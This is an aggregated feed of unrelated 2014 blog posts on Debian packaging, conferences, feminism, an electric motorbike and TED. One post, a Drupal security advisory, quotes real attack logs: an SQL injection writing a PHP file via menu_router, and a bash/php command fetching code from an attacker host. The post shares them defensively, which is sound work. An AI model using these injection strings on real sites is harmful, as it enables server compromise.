    •  Comic Books are Still Made by Men, For Men, and About Men | FiveThirtyEight (October 13): “But these recent advancements don’t make up for the fact that women have been ignored in comic books for decades. And they still don’t bring women anywhere close to parity: Females make up about one in four comic book characters. Among comic-creators, the numbers are even more discouraging. Tim Hanley, a comics historian and researcher, analyzes who’s behind each month’s batch of releases, counting up writers, artists, editors, pencilers and more. In August, Hanley found that men outnumbered women nine-to-one behind the scenes at both DC and Marvel.”
    • Life, Engineered: How Lynn Conway reinvented her world and ours | University of Michigan (October 8): “Ten years earlier, Conway had been one of the first Americans to undergo a modern gender transition. It had cost her a job and her family. Once she established herself as a woman, she kept the past a secret. Conway stayed behind the scenes as much as she could. As a result, so did many of her achievements.”

    We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet DebianMartin Pitt: Ramblings from LinuxCon/Plumbers 2014

    I’m on my way home from Düsseldorf where I attended the LinuxCon Europe and Linux Plumber conferences. I was quite surprised how huge LinuxCon was, there were about 1.500 people there! Certainly much more than last year in New Orleans.

    Containers (in both LXC and docker flavors) are the Big Thing everybody talks about and works with these days; there was hardly a presentation where these weren’t mentioned at all, and (what felt like) half of the presentations were either how to improve these, or how to use these technologies to solve problems. For example, some people/companies really take LXC to the max and try to do everything in them including tasks which in the past you had only considered full VMs for, like untrusted third-party tenants. For example there was an interesting talk how to secure networking for containers, and pretty much everyone uses docker or LXC now to deploy workloads, run CI tests. There are projects like “fleet” which manage systemd jobs across an entire cluster of containers (distributed task scheduler) or like project-builder.org which auto-build packages from each commit of projects.

    Another common topic is the trend towards building/shipping complete (r/o) system images, atomic updates and all that goodness. The central thing here was certainly “Stateless systems, factory reset, and golden images” which analyzed the common requirements and proposed how to implement this with various package systems and scenarios. In my opinion this is certainly the way to go, as our current solution on Ubuntu Touch (i. e. Ubuntu’s system-image) is far too limited and static yet, it doesn’t extend to desktops/servers/cloud workloads at all. It’s also a lot of work to implement this properly, so it’s certainly understandable that we took that shortcut for prototyping and the relatively limited Touch phone environment.

    On Plumbers my main occupations were mostly the highly interesting LXC track to see what’s coming in the container world, and the systemd hackfest. On the latter I was again mostly listening (after all, I’m still learning most of the internals there..) and was able to work on some cleanups and improvements like getting rid of some of Debian’s patches and properly run the test suite. It was also great to sync up again with David Zeuthen about the future of udisks and some particular proposed new features. Looks like I’m the de-facto maintainer now, so I’ll need to spend some time soon to review/include/clean up some much requested little features and some fixes.

    All in all a great week to meet some fellows of the FOSS world a gain, getting to know a lot of new interesting people and projects, and re-learning to drink beer in the evening (I hardly drink any at home :-P).

    If you are interested you can also see my raw notes, but beware that there are mostly just scribbling.

    Now, off to next week’s Canonical meeting in Washington, DC!

    Planet DebianGunnar Wolf: #Drupal7 sites under attack — Don't panic!

    Two days ago, Drupal announced version 7.32 was available. This version fixes a particularly nasty bug, allowing a SQL injection at any stage of interaction (that means, previous to the authentication taking place).

    As soon as I could, I prepared and uploaded Debian packages for this — So if you run a Debian-provided Drupal installation, update now. The updated versions are:

    sid / jessie (unstable / testing)
    7.32-1
    wheezy (stable)
    7.14-2+deb7u7
    wheezy-backports
    7.32-1~bpo70+1
    squeeze-backports (oldstable)
    7.14-2+deb7u7~bpo60+1

    And, as expected, I'm already getting several attacks on my sites. Good thing that will help you anyway: Even though it won't prevent the attack from happening, if you use suhosin, several of the attacks will be prevented. Yes, sadly suhosin has not been in a stable Debian release since Wheezy, but still... :-|

    Partial logs. This looks like a shellcode being injected as a file created via the menu_router mechanism (shellcode snipped):

    1. Oct 16 15:22:21 lafa suhosin[3723]: ALERT - configured request variable
    2. total name length limit exceeded - dropped variable 'name[0; INSERT INTO
    3. `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`,
    4. `access_callback`, `access_arguments`) VALUES ('deheky', '', '', 'deheky',
    5. 'file_put_contents',
    6. +0x613a323a7b693a303b733a32323a226d6f64756c65732f64626c6f672f746e777(...)
    7. );;# ]' (attacker '62.76.191.119', file '/usr/share/drupal7/index.php')

    While the previous one is clearly targetting this particular bug, I'm not sure about this next one: It is just checking for some injection viability before telling me its real intentions:

    1. Oct 17 10:26:04 lafa suhosin[3644]: ALERT - configured request variable
    2. name length limit exceeded - dropped variable
    3. '/bin/bash_-c_"php_-r_\"file_get_contents(
    4. 'http://hello_hacked_jp/hello/?l'
    5. (attacker '77.79.40.195', file '/usr/share/drupal7/index.php')

    So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

    Anyway... We shall see many such attempts in the next weeks :-|

    [update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

    For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.

    Planet DebianErich Schubert: Google Earth on Linux

    Google Earth for Linux appears to be largely abandoned by Google, unfortunately. The packages available for download cannot be installed on a modern amd64 Debian or Ubuntu system due to dependency issues.
    In fact, the adm64 version is a 32 bit build, too. The packages are really low quality, the dependencies are outdated, locales support is busted etc.
    So here are hacky instructions how to install nevertheless. But beware, these instructions are a really bad hack.
    1. These instructions are appropriate for version 7.1.2.2041-r0. Do not use them for any other version. Things will have changed.
    2. Make sure your system has i386 architecture enabled. Follow the instructions in section "Configuring architectures" on the Debian MultiArch Wiki page to do so
    3. Install lsb-core, and try to install the i386 versions of these packages, too!
    4. Download the i386 version of the Google Earth package
    5. Install the package by forcing dependencies, via
      sudo dpkg --force-depends -i google-earth-stable_current_i386.deb
      
    6. As of now, your package manager will complain, and suggest to remove the package again. To make it happy, we have to hack the installed packages list. This is ugly, and you should make a backup. You can totally bust your system this way... Fortunately, the change we're doing is rather simple. As admin, edit the file /var/lib/dpkg/status. Locate the section Package: google-earth-stable. In this section, delete the line starting with Depends:. Don't add in extra newlines or change anything else!
    7. Now the package manager should believe the dependencies of Google Earth are fulfilled, and no longer suggest removal. But essentially this means you have to take care of them yourself!
    Some notes on using Google Earth:
    • Locales are busted. Use LC_NUMERIC=en_US.UTF-8 google-earth to start it. Otherwise, it will fail parsing coordinates, if you are in a locale that uses a different number format.
    • You may need to install the i386 versions of some libraries, in particular of your OpenGL drivers! I cannot provide you with a complete list.
    • Search doesn't work sometimes for me.
    • Occassionally, it reports "unknown" network errors.
    • If you upgrade Nvidia graphics drivers, you will usually have to reboot, or you will see graphics errors.
    • Some people have removed/replaced the bundled libQt* and libfreeimage* libraries, but that did not work for me.

    Planet DebianTanguy Ortolo: Trying systemd [ OK ] Switching back to SysV [ OK ]

    Since systemd is now the default init system under Debian Jessie, it got installed to my system and I had a chance to test it. The result is disappointing: it does not work well with cryptsetup, so I am switching back to SysV init and RC.

    The problem comes from the fact that I am using encrypted drives with cryptsetup, and while this is correctly integrated with SysV, it just sucks with systemd, where the passphrase prompt is mixed up with service start messages, a bit like that (from memory, since I did not take a picture of my system booting):

    Enter passphrase for volume foobar-crypt:
    [ OK ] Sta*rting serv*ice foo**
    [ OK ] ***Starting service bar**
    [ OK ] Starting service baz****
    

    The stars correspond to the letters I type, and as you can see, as the passphrase prompt does not wait for my input, they get everywhere in the boot messages, and there is no clear indication that the passphrase was accepted. This looks like some pathological optimization for boot speed, where even interactive steps are run in parallel with services startup: sorry, but this is just insane.

    There may exist ways to work around this issue, but I do not care: SysV init works just fine with no setup at all, and I since have no real need for another init system, systemd as a replacement is only acceptable if it works at least as fine for my setup, which is not the case. Goodbye systemd, come back when you are ready.

    Sociological Images“Rental Dreads”: Female Sex Tourists in the Caribbean

    Flashback Friday.

    While preparing a lecture on sex tourism, I ran across this video about men who have sex with female tourists in the Caribbean:

    <object data="http://www.youtube.com/v/KtU3m2M1Ivs&amp;hl=en&amp;fs=1" height="344" type="application/x-shockwave-flash" width="425"><param name="allowFullScreen" value="true"/><param name="allowscriptaccess" value="always"/><param name="src" value="http://www.youtube.com/v/KtU3m2M1Ivs&amp;hl=en&amp;fs=1"/><param name="allowfullscreen" value="true"/></object>

    There’s a lot of interesting stuff going on there, no? I was fascinated by the female hotel owner who talks about the men “preying” on the female tourists, clearly placing the power in the hands the men who, she argues, use the female tourists for money but don’t really care about them. I tried to imagine someone talking similarly about female sex workers “preying” on foreign men’s need for affection and attention.

    This might make for a great discussion about perceptions of sexual agency: how do gendered sexual norms, economic differences, and the different races and nationalities of the individuals involved affect how we think of their interactions and who we see as the victim?

    In her chapter on sex tourism in Race, Ethnicity, and Sexuality), sociologist Joane Nagel discusses the role of racialized sexualities in making some groups attractive tourists looking for an ethnosexual adventure. In the Caribbean, dark-skinned men with dreads are particularly attractive to some female tourists because of stereotypes of Black men as extremely sexual and masculine, which plays into fantasies of being swept away by a strong, skilled lover. At the same time, White Western women may represent the possibility of a better life (through continued gifts of money even after the vacation is over) and sexualized adventures to the men they sleep with while on vacation. Nagel argues that these encounters generally reinforce, rather than challenge, existing racial and gender inequalities, since they play on stereotypes of sexualized Others as animalistic, primitive, and, in the case of men, as super-masculine (and super-endowed).

    Then again, Nagel also questions whether any relationship between tourists and “local” men should count as sex work. The individuals involved don’t necessarily think of their interactions in those terms. And who is to decide if a particular situation is “sex tourism” as opposed to a “real” relationship? How does that assumption invalidate the possibility that Black men and White women might have real, meaningful relationships? Or primarily sexual relationships, but with both partners respecting the other?

    Originally posted in 2009.

    Gwen Sharp is an associate professor of sociology at Nevada State College. You can follow her on Twitter at @gwensharpnv.

    (View original at http://thesocietypages.org/socimages)

    Planet DebianLucas Nussbaum: Debian Package of the Day revival (quite)

    TL;DR: static version of http://debaday.debian.net/, as it was when it was shut down in 2009, available!

    A long time ago, between 2006 and 2009, there was a blog called Debian Package of the Day. About once per week, it featured an article about one of the gems available in the Debian archive: one of those many great packages that you had never heard about.

    At some point in November 2009, after 181 articles, the blog was hacked and never brought up again. Last week I retrieved the old database, generated a static version, and put it online with the help of DSA. It is now available again at http://debaday.debian.net/. Some of the articles are clearly outdated, but many of them are about packages that are still available in Debian, and still very relevant today.

    Planet DebianRhonda D'Vine: New Irssi

    After a long time a new irssi upstream release hit the archive. While the most notable change in 0.8.16 was DNSSEC DANE support which is enabled (for linux, src:dnsval has issues to get compiled on kFreeBSD), the most visible change in 0.8.17 was addition of support for both 256 colors and truecolor. While the former can be used directly, for the later you have to explicitly switch the setting colors_ansi_24bit to on. A terminal support it is needed for that though. To test the 256 color support, your terminal has to support it, your TERM environment variable has to be properly set, and you can test it with the newly added /cubes alias. If you have an existing configuration, look at the Testing new Irssi wiki page which helps you get that alias amongst giving other useful tipps, too.

    The package currently only lives in unstable, but once it did flow over to testing I will update it in wheezy-backports, too.

    Enjoy!

    /debian | permanent link | Comments: 0 | Flattr this

    Planet Linux AustraliaPaul Wayper: That time that I registered an electric vehicle

    So, tell us a story, Uncle Paul.

    Sure. One time when I was in Rovers, ...

    No, tell us the story of how you got your electric motorbike registered!

    Oh, okay then.

    It was the 20th of February - a Friday. I'd taken the day off to get the bike registered. I'd tried to do this a couple of weeks before then, but I found out that, despite being told a month beforehand that the workload on new registrations was only a couple of days long, when I came to book it I found out that the earliest they could do was the 20th, two weeks away. So the 20th it was.

    That morning I had to get the bike inspected by the engineer, get his sign-off, and take it down to the motor registry to get it inspected at 8:30AM. I also had to meet the plumber at our house, which meant I left a bit late, and by the time I was leaving the engineer it was already 8:15AM and I was in traffic. Say what you like about Canberra being a small town, but people like driving in and the traffic was a crawl. I rang the motor registry and begged for them to understand that I'd be there as soon as possible and that I might be a couple of minutes late. I squeaked into the entrance just as they were giving up hope, and they let me in because of the novelty of the bike and because I wasn't wasting their time.

    The roadworthy inspection went fairly harmlessly - I didn't have a certificate from a weighbridge saying how heavy it was, but I knew it was only about eight kilos over the original bike's weight, so probably about 240 kilos? "OK, no worries," they said, scribbling that down on the form. The headlights weren't too high, the indicators worked, and there was no problem with my exhaust being too loud.

    (Aside: at the inspection station there they have a wall full of pictures of particularly egregious attempts to get dodgy car builds past an inspection. Exhaust stuffed full of easily-removable steel wool? Exhausts with bit burnt patches where they've been oxy'd open and welded shut again? Panels attached with zip ties? Bolts missing? Plastic housings melted over ill-fitted turbos? These people have seen it all. Don't try to fool them.)

    Then we came up to the really weird part of my dream. You know, the part where I know how to tap dance, but I can only do it while wearing golf shoes?

    Er, sorry. That was something else. Then we came to the weird part of the process.

    Modified vehicles have to get a compliance plate, to show that they comply with the National Code of Practice on vehicle conversions. The old process was that the engineer that inspected the vehicle to make sure it complied had blank compliance plates; when you brought the vehicle in and it passed their inspection, they then filled out all the fields on the plate, attached the plate to the vehicle, and then you transported it down to Main Roads. But that was a bit too open to people stealing compliance plates, so now they have a "better" system. What I had to do was:

    1. Get the bike inspected for road worthiness.
    2. They hand me a blank compliance plate.
    3. I then had to take it to the engineer, who told me the fields to fill in.
    4. He then told me to go to a trophy making place, where they have laser etchers that can write compliance plates beautifully.
    5. I arrive there at 11AM. They say it'll be done by about 2PM.
    6. Go and have lunch with friends. Nothing else to do.
    7. Pick etched compliance plate up.
    8. Take compliance plate back to engineer. Because he's busy, borrow a drill and a rivet gun and attach the plate to the bike myself.
    9. Take it back to Main Roads, who check that the plate is attached to the bike correctly and stamp the road worthiness form. Now I can get the bike registered.
    Yeah, it's roundabout. Why not keep engrave the plates at Main Roads with the details the Engineer gives to them? But that's the system, so that's what I did.

    And so I entered the waiting department. It only probably took about fifteen minutes to come up next in the queue, but it was fifteen minutes I was impatient to see go. We went through the usual hilarious dance with values:

    • Her: What are you registering?
    • Me: An electric motorbike.
    • Her: How many cylinders?
    • Me: Er... it's electric. None.
    • Her: None isn't a value I can put in.
    • Me: (rolls eyes) OK, one cylinder.
    • Her: OK. How many cubic centimetres?
    Many months ago I had enquired about custom number plates, and it turns out that motorbikes can indeed have them. Indeed, I could by "3FAZE" if I wanted. For a mere $2,600 or so. It was very tempting, but when I weighed it up against getting new parts for the bike (which it turned out I would need sooner rather than later, but that's a story for another day) I thought I'd save up for another year.

    So I finally picked up my new set of plates, thanked her for her time, and said "Excuse me, but I have to do this:" and then yelled:

    "Yes!!!!"

    Well, maybe I kept my voice down a little. But I had finally done it - after years of work, several problems, one accident, a few design changes, and lots of frustration and gradual improvement, I had an actual, registered electric motorbike I had built nearly all myself.

    I still get that feeling now - I'll be riding along and I'll think, "wow, I'm actually being propelled along by a device I built myself. Look at it, all working, holding together, acting just like a real motorbike!" It feels almost like I've got away with something - a neat hack that turns out to work just as well as all those beautifully engineered mega-budget productions. I'm sure a lot of people don't notice it - it does look a bit bulky, but it's similar enough to a regular motorbike that it probably just gets overlooked as another two-wheeled terror on the roads.

    Well, I'll just have to enjoy it myself then :-)

    Planet DebianPetter Reinholdtsen: Debian Jessie, PXE and automatic firmware installation

    When PXE installing laptops with Debian, I often run into the problem that the WiFi card require some firmware to work properly. And it has been a pain to fix this using preseeding in Debian. Normally something more is needed. But thanks to my isenkram package and its recent tasksel extension, it has now become easy to do this using simple preseeding.

    The isenkram-cli package provide tasksel tasks which will install firmware for the hardware found in the machine (actually, requested by the kernel modules for the hardware). (It can also install user space programs supporting the hardware detected, but that is not the focus of this story.)

    To get this working in the default installation, two preeseding values are needed. First, the isenkram-cli package must be installed into the target chroot (aka the hard drive) before tasksel is executed in the pkgsel step of the debian-installer system. This is done by preseeding the base-installer/includes debconf value to include the isenkram-cli package. The package name is next passed to debootstrap for installation. With the isenkram-cli package in place, tasksel will automatically use the isenkram tasks to detect hardware specific packages for the machine being installed and install them, because isenkram-cli contain tasksel tasks.

    Second, one need to enable the non-free APT repository, because most firmware unfortunately is non-free. This is done by preseeding the apt-mirror-setup step. This is unfortunate, but for a lot of hardware it is the only option in Debian.

    The end result is two lines needed in your preseeding file to get firmware installed automatically by the installer:

    base-installer base-installer/includes string isenkram-cli
    apt-mirror-setup apt-setup/non-free boolean true
    

    The current version of isenkram-cli in testing/jessie will install both firmware and user space packages when using this method. It also do not work well, so use version 0.15 or later. Installing both firmware and user space packages might give you a bit more than you want, so I decided to split the tasksel task in two, one for firmware and one for user space programs. The firmware task is enabled by default, while the one for user space programs is not. This split is implemented in the package currently in unstable.

    If you decide to give this a go, please let me know (via email) how this recipe work for you. :)

    So, I bet you are wondering, how can this work. First and foremost, it work because tasksel is modular, and driven by whatever files it find in /usr/lib/tasksel/ and /usr/share/tasksel/. So the isenkram-cli package place two files for tasksel to find. First there is the task description file (/usr/share/tasksel/descs/isenkram.desc):

    Task: isenkram-packages
    Section: hardware
    Description: Hardware specific packages (autodetected by isenkram)
     Based on the detected hardware various hardware specific packages are
     proposed.
    Test-new-install: show show
    Relevance: 8
    Packages: for-current-hardware
    
    Task: isenkram-firmware
    Section: hardware
    Description: Hardware specific firmware packages (autodetected by isenkram)
     Based on the detected hardware various hardware specific firmware
     packages are proposed.
    Test-new-install: mark show
    Relevance: 8
    Packages: for-current-hardware-firmware
    

    The key parts are Test-new-install which indicate how the task should be handled and the Packages line referencing to a script in /usr/lib/tasksel/packages/. The scripts use other scripts to get a list of packages to install. The for-current-hardware-firmware script look like this to list relevant firmware for the machine:

    #!/bin/sh
    #
    PATH=/usr/sbin:$PATH
    export PATH
    isenkram-autoinstall-firmware -l
    

    With those two pieces in place, the firmware is installed by tasksel during the normal d-i run. :)

    If you want to test what tasksel will install when isenkram-cli is installed, run DEBIAN_PRIORITY=critical tasksel --test --new-install to get the list of packages that tasksel would install.

    Debian Edu will be pilots in testing this feature, as isenkram is used there now to install firmware, replacing the earlier scripts.

    CryptogramHacking a Video Poker Machine

    Kevin Poulsen has written an interesting story about two people who successfully exploited a bug in a popular video poker machine.

    Worse Than FailureError'd: Sorry, but You Can't Do the Math

    "I guess that Intuit might have reasons for not allowing me to say Math was my least favorite subject in school," writes Alan R.

     

    "I really wanted to buy an audiobook or three, but I doubt it would be prudent considering the price," wrote L. H.

     

    Based on Petrea M's error, I have to wonder if there's also a TRUE and FALSE were also beginning in Hearthstone.

     

    "Even if nobody is in line at McDonalds, turns out it can still get pretty busy," writes Bob W.

     

     

    "At first, I was a little concerned that iFixit didn't carry the tool I needed to fix my Wii U," Tyler writes, "Thank goodness iFixit had it in stock!"

     

    Jan wrote, "I'm not sure that these are the enterprise experts that I want to work with!"

     

    "Sadly, I don't think that I'm smart enough to sign up," Sam P. writes.

     

    "While browsing Careers 2.0, I noticed this Amazon job," wrote Caleb, "I don't think that applying would be good for my self-esteem."

     

    Planet Linux AustraliaAndrew Pollock: [life] Day 261: Lots of play dates with boys, TumbleTastics, and a fairy gathering

    Today was a typical jam packed day. Zoe had a brief wake up at at some point overnight because she couldn't find Cowie, right next to her head, but that was it.

    First up, the PAG fundraising committee come over for a quick (well, more like 2 hour) meeting at my place to discuss planning for the sausage sizzle tomorrow. Because I don't have Zoe, I've volunteered to do a lot of the running around, so I'm going to have a busy day.

    Mel had brought Matthew and Olivia with her, so Zoe and Matthew had a good time playing, and Olivia kept trying to join in.

    That meeting ran right up until I realised we had to head off for TumbleTastics, so Zoe got ready in record time and we scootered over and made it there just as her class was starting. I was sure we were going to be late, so I was happy we made it in time.

    Lachlan and his Mum, Laura, and little sister came over for lunch again afterwards, and stayed for a little while.

    After they left, we started getting ready for the Fairy Nook's attempt to break the Guiness Book of Records record for the most fairies in one place. We needed to get a wand, so once Zoe was appropriately attired, we walked around the corner to Crackerjack Toys and picked up a wand.

    After that, I popped up to Mel's place to collect a whole bunch of eskies that the local councillor had lent us for the sausage sizzle. Mel had also picked up a tutu for Zoe from the local two dollar store in her travels.

    We got home, and then walked to the Hawthorne AFL oval where the record attempt was. Initially there were like two other fairies there, but by 4:30pm, there was a pretty good turnout. I don't know what the numbers were, but I'm pretty sure they were well under the 872 they needed. There was a jumping castle and a few of Zoe's friends from Kindergarten, so it was all good.

    Sarah arrived to pick up Zoe from there, and I walked home.

    ,

    Kelvin ThomsonWe Must Tackle Youth Unemployment

    I believe that local communities working together with local businesses, local government and social services can play an important role in helping build meaningful partnerships between young people and job opportunities in the current economic climate. <o:p></o:p>

    I support the Jobs for Youth Campaign which will be running across Moreland, Darebin and Yarra in October, which aims to match 100 people aged 16 to 24 with local employment opportunities, and attempt to stem joblessness in our region.<o:p></o:p>

    The Jobs Expos being hosted as part of the campaign will put young people directly in touch with real employers and real job opportunities, including McDonald’s, Aplus Apprenticeships, Traineeship services along with other businesses and agencies. Young people are encouraged to bring along their resumes, or can seek help by making one there. The Darebin Jobs Expo will be held on Tuesday, October 21 at NCAT Preston, Yarra Expo on Wednesday, October 29 at The Reading room Fitzroy, and the Moreland Expo will be held on Friday, October 31 at the Coburg Town Hall.<o:p></o:p>

    The Real Industry Job Interview (RIJI) Program has recruited volunteers to participate as interviewers this coming Friday, October 17. The Program will engage almost 700 young people from local schools from the Cities of Yarra, Darebin and Moreland; to assist and guide them in resume, job interview and job application preparations. This sort of program is highly beneficial for young local jobseekers and students as they seek to enter the a very tight and competitive job market. I will be participating in the interview day and am looking forward to helping give young people some hints and tips about effective ways they can apply and succeed in looking for work.<o:p></o:p>

    In April I met with local Youth Connections providers, and wrote to the current Liberal Government to support the Youth Connections program that was set up by Labor in 2010 to stop young people falling between the cracks. Youth Connections has already helped 75,000 young people reengage with education and employment. The program helps young people who drop out of school either head back to the classroom, or complete an alternative year 12 qualification, combined with work. It is disgraceful the Liberal Government has refused to support ongoing investment in such programs.<o:p></o:p>

    These are great initiatives and I commend Moreland City Council, City of Darebin, City of Yarra, Youth Connections, Darebin Youth Commitment, Moreland Youth Commitment, Yarra Youth Commitment, and Inner Northern Learning, for spearheading the need for more young people to be employed and engaged locally. More information on these initiatives can be found at www.jobsforyouth.com.au <o:p></o:p>

    Victorian Labor’s Jobs Plan which will help create 100,000 full time jobs for the unemployed through the $100 million Back to Work Act, payroll tax relief, incentives for business to hire long term unemployed, retrenched workers and unemployed youth, the Premier’s Jobs and Investment Panel, a Future Industries Fund of $200 million, a Regional Jobs Fund, Super Trade Missions, and through the removal of 50 level crossings, build the Melbourne Metro Rail, removing 5,000 trucks from the Westgate Bridge, creating 10,00 construction jobs and guaranteeing $2 billion for country and suburban roads. These are all worthy initiatives that will begin to kick start job opportunities for our unemployed young people.<o:p></o:p>

    Along with investing in our manufacturing, skills and education sectors, supporting our local community initiatives, the Federal and State Victorian Liberal Governments would be better off cutting back our migrant worker programs that are placing unfair competition on local young people’s chance of getting a job.<o:p></o:p>

    Under the current approach they’re adopting, youth unemployment will get a lot worse before it gets better. Providing young people with good quality job opportunities from an early stage helps our overall economic and social wellbeing by giving our next generation hope. Hope that they can make a good income, hope they can hold a decent standard of living, hope that they can one day buy their own home, raise a family, and live a comfortable, safe and healthy life. Giving young people the chance to build their self-respect, resilience and dignity, is incredibly important and goes hand in hand with giving young people the chance of having a job.<o:p></o:p>

    Planet Linux Australialinux.conf.au News: Speaker Feature: Laura Bell, Michael Cordover

    Laura Bell

    Laura Bell

    Why can't we be friends? Integrating Security into an Existing Agile SDLC

    3:40pm Friday 16th January 2015

    Laura describes herself as an application security wrangler, repeat dreamer, some-time builder, python juggler, Mom and wife.

    For more information on Laura and her presentation, see here. You can follow her as @lady_nerd and don’t forget to mention #LCA2015.


    Michael Cordover

    Michael Cordover

    Using FOI to get source code: the EasyCount experience

    3:40pm Wednesday 14th January 2015

    Michael is interested in the law, science, politics and everything in between. He worked in computing, event management and project management. He a policy wonk and systems-oriented and he loves variety but is interested in detail.

    His life goal as a child was to know everything. He says that's impossible but is still trying to get as close as he can.

    For more information on Michael and his presentation, see here. You can follow him as @mjec and don’t forget to mention #LCA2015.

    LongNowKevin Kelly Seminar Tickets

     

    The Long Now Foundation’s monthly

    Seminars About Long-term Thinking

    Kevin Kelly presents Technium Unbound

    Kevin Kelly presents “Technium Unbound”

    TICKETS

    Wednesday November 12, 02014 at 7:30pm SFJAZZ Center

    Long Now Members can reserve 2 seats, join today! General Tickets $15

     

    About this Seminar:

    What comes after the Internet? What is bigger than the web? What will produce more wealth than all the startups to date? The answer is a planetary super-organism comprised of 4 billion mobile phones, 80 quintillion transistor chips, a million miles of fiber optic cables, and 6 billion human minds all wired together. The whole thing acts like a single organism, with its own behavior and character — but at a scale we have little experience with.

    This is more than just a metaphor. Kelly takes the idea of a global super-organism seriously by describing what we know about it so far, how it is growing, where its boundaries are, and what it will mean for us as individuals and collectively. Both the smallest one-person enterprises today, and the largest mega-corporations on Earth, will have to learn to how this Technium operates, and how to exploit it.

    TEDWant to learn how to give a great talk? Chris Anderson is writing the official TED guide to public speaking

    In the book, "Talk This Way! The Official TED Guide to Public Speaking," our curator Chris Anderson will gives insights on what makes a talk great. Photo: James Duncan Davidson

    In the upcoming book “Talk This Way! The Official TED Guide to Public Speaking,” our curator Chris Anderson will give insights on what makes a talk great. Photo: James Duncan Davidson

    Over and over, you keep asking us: What’s the best way to give a TED Talk? It’s not just that you’re interested in sharing your ideas at a TED or local TEDx event. Short presentations have become a bread-and-butter staple at schools and offices around the world, and you want more guidance on how to give them well.

    And so, our curator Chris Anderson is writing a book to be published by Houghton Mifflin Harcourt in spring 2016. Titled Talk This Way! The Official TED Guide to Public Speaking, it will be packed with insights on what makes talks work.

    “There was no one spark for writing this book—it’s more like a long-smoldering fire that’s now ready to break out,” he told the TED Blog. “A decade ago, speaker prep at TED was simple: We’d agree on a basic talk idea, send the speaker a plaque of ‘the TED Commandments’ and wait to see what they showed up with. In recent years we’ve been stepping up our pre-conference engagement with speakers, encouraging them to carry out early rehearsals, working with some of them on their scripts. We’ve found the process to be incredibly valuable. We’ve seen speakers who start out nervous and/or with unfocused ideas come through to give truly compelling talks.”

    One of the main points: there simply is no one-size-fits-all approach. 

    “We should be clear on one thing. There is no single formula to giving a TED Talk. Indeed, the most annoying talks of all are those that seem to think there is,” he says. “But at the same time, there’s a ton of important advice to offer, including a key metaphor that many speakers find helpful. I’ll offer all the guidance I can, but much of it is in helping speakers to find the type of talk that’s right for them. And by the way, the book isn’t just for TED Talks. It’s meant to be helpful for any form of public speaking or presentation.”

    Another key goal for the book: highlighting the amazing power of direct human-to-human communication, recorded on video, in the Internet age.

    While we hope that this book will be helpful to you, we also see it as another way to foster TED’s mission of sharing ideas for free to the world. All proceeds from the book — from the advance to sales — will be donated to TED’s nonprofit parent company, and will support the free sharing of TED Talks and other free programs around the world.

    The book will be available internationally. So far, rights have been negotiated in Canada, Brazil, China, the Czech Republic, Finland, Germany, Greece, Hungary, Israel, Italy, Japan, Russia, Spain, Sweden, Taiwan and the UK, and deals are in progress in France, Poland and Portugal.

    Have specific questions about giving a talk that you’d like answered in the book? Email blog@ted.com and we’ll pass them on to Chris. Who is busily typing away on this book as we speak.

    “It’s fun!” he tells us. “I mean, not all the time — I can definitely get hit with intense writer’s block. But when it flows, it’s really exciting. There’s so much great material to tap into. Examples from hundreds of different TED Talks, and the direct advice from about 30 favorite speakers who have been generous enough to share their wisdom. If all I do is channel them, all will be well.”


    Geek FeminismRe-stating our support for the victim/survivor in the Dana McCallum case

    [Content warning: rape]

    Back in April, we published a statement of support for the victim in the Dana McCallum rape case. In the letter — written by Liz Henry and co-signed by Leigh Honeywell, Valerie Aurora, Brenda Wallace, Tim Chevalier (me), Annalee Flower Horne, and Beth Flanagan — we stated our empathy and support for the victim/survivor — who is McCallum’s wife (they are in the process of divorcing) — in this case as well as for her family.

    This month, McCallum accepted a guilty plea for two misdemeanors in this case: one count of domestic violence with corporal injury to the spouse and one count of false imprisonment. McCallum will serve probation, community service, and will have to undergo counseling. We already included this link in a linkspam, but given our previous statement of support for McCallum’s victim, I want to reiterate that support.

    As Liz wrote in our statement of support back in April, “Rape is a horrible violent crime no matter who the rapist is.” McCallum’s wife read a statement that says, in part:

    I must say that it deeply saddens me that as a victim, my only public support has been from hate groups. I expected more from the LGBT and feminist community. It’s a shame that they can’t do the emotional work it requires to process that someone they love is capable of such an awful crime. That is their burden to carry, though.

    In April, we also expressed disappointment in the transmisogynistic response to McCallum’s crime. As geek feminists, we believed then, and do now, that we can and must accept that someone in our community is capable of the crime of rape. Hard as it may be to accept, self-identified feminists can sustain rape culture — up to and including actually committing rape — too. We also believe that at the same time, we must resist the narrative that would use this crime to de-gender or misgender McCallum and, by extension, trans women. Rape can be committed by anyone, regardless of their assigned sex at birth or their self-affirmed sex or gender. Structural power dynamics and rape culture mean it’s far more likely to be committed by cis men than by people in any other group, but that is a fact that needs to inform anti-rape organizing — it does not make rapes committed by specific non-cis, non-male people less damaging.

    McCallum’s wife also said that she still loves McCallum and wants “forgiveness” to prevail. The Revolution Starts at Home (PDF link) is recommended reading for anyone curious about what that might look like.

    Edited to add: McCallum’s ex has also written a public blog post, as a guest post on Helen Boyd’s blog, about her experience:

    The transphobic radical feminists and other transphobic people will continue to rage over the state of my wife’s genitals, and I can’t stop them. But I hope more intelligent and thoughtful people will rise to the occasion to steer the conversation to what really matters.

    I want her to be accountable. I want this to never happen again. I want to forgive her. I want this story to be about forgiveness and redemption. I need it to be. I need others to let it be that, too – to be my story, my trauma, my choice, my agency.

    I recommend reading the post, but not the comments.

    Planet DebianBits from Debian: Help empower the Debian Outreach Program for Women

    Debian is thrilled to participate in the 9th round of the GNOME FOSS Outreach Program. While OPW is similar to Google Summer of Code it has a winter session in addition to a summer session and is open to non-students.

    Back at DebConf 14 several of us decided to volunteer because we want to increase diversity in Debian. Shortly thereafter the DPL announced Debian's participation in OPW 2014.

    We have reached out to several corporate sponsors and are thrilled that so far Intel has agreed to fund an intern slot (in addition to the slot offered by the DPL)! While that makes two funded slots we have a third sponsor that has offered a challenge match: for each dollar donated by an individual to Debian the sponsor will donate another dollar for Debian OPW.

